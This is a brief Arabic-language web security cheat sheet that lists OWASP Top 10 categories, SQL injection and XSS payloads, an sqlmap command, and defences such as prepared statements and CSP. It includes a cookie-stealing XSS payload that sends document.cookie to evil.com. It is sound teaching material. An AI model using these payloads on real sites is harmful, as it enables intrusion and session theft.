أمن تطبيقات الويب

أمن تطبيقات الويب

OWASP Top 10

1. ▸Broken Access Control
2. ▸Cryptographic Failures
3. ▸Injection - SQL, NoSQL, Command
4. ▸Security Misconfiguration
5. ▸SSRF - طلبات جانب السيرفر المزيفة

SQL Injection

' OR '1'='1
' UNION SELECT table_name,2 FROM information_schema.tables--

sqlmap -u "http://target.com/page?id=1" --dbs --tables

XSS

<script>alert('XSS')</script>
<img src=x onerror="fetch('//evil.com/'+document.cookie)">

الحماية

✅ Prepared Statements ✅ Content Security Policy ✅ CSRF Tokens ✅ Input Validation